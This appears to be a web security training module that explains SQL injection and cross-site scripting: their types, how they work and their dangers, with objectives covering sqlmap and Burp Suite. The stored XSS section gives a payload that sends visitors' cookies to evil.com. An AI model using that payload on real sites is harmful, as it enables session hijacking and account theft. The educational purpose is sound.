SQL Injection & XSS

Web Application Security Testing

Master SQL injection and Cross-Site Scripting vulnerabilities. Learn manual testing techniques, automated tools, and practical exploitation methods for web application security assessment.

Learning Objectives

Understand what SQL Injection is and how it works
Learn manual SQL injection testing techniques
Master sqlmap for automated SQL injection attacks
Understand Cross-Site Scripting (XSS) fundamentals
Differentiate between Reflected and Stored XSS
Use Burp Suite Repeater for web vulnerability testing
Identify and exploit SQL injection vulnerabilities
Inject and trigger XSS payloads effectively

SQL Injection & XSS Concepts

Understanding web application vulnerabilities

What is SQL Injection?

SQL Injection (SQLi) is a code injection technique that attacks data-driven applications

How It Works

• Malicious SQL statements are inserted into an entry field
• Application database executes the malicious statements
• Attackers can bypass authentication, access data, modify database
• Can lead to complete system compromise

Dangers

• Data theft and exfiltration
• Database modification or deletion
• Authentication bypass
• Privilege escalation
• Complete system takeover

Impact: One of the most critical web vulnerabilities, ranked #1 in OWASP Top 10

SQL Injection Types

Different categories of SQL injection attacks

Types

In-band SQLi

Attacker receives immediate response

Examples: Union-based SQLi, Error-based SQLi

Blind SQLi

No direct error messages from database

Examples: Boolean-based SQLi, Time-based SQLi

Out-of-band SQLi

Attacker triggers external network connections

Examples: DNS exfiltration, HTTP requests

Cross-Site Scripting (XSS)

Client-side code injection attack where malicious scripts are injected into web applications

How It Works

• Attacker injects malicious JavaScript into web page
• Victim's browser executes the malicious script
• Script runs in context of trusted website
• Can steal cookies, session tokens, or perform actions

Dangers

• Session hijacking and theft
• Credential harvesting
• Website defacement
• Malware distribution
• Phishing attacks

XSS Categories

Different types of XSS attacks

Types

Reflected XSS

Malicious script is reflected off web server to victim

Characteristics: Non-persistent, URL-based, Immediate execution

Example: <script>alert(1)</script> in URL parameter

Stored XSS

Malicious script is permanently stored on target server

Characteristics: Persistent, Stored in database, Affects all users

Example: <script>document.location="http://evil.com/steal?cookie="+document.cookie</script> in comment

DOM-based XSS

Vulnerability exists in client-side code

Characteristics: Client-side only, No server interaction, Modern web applications

Example: Unsafe JavaScript DOM manipulation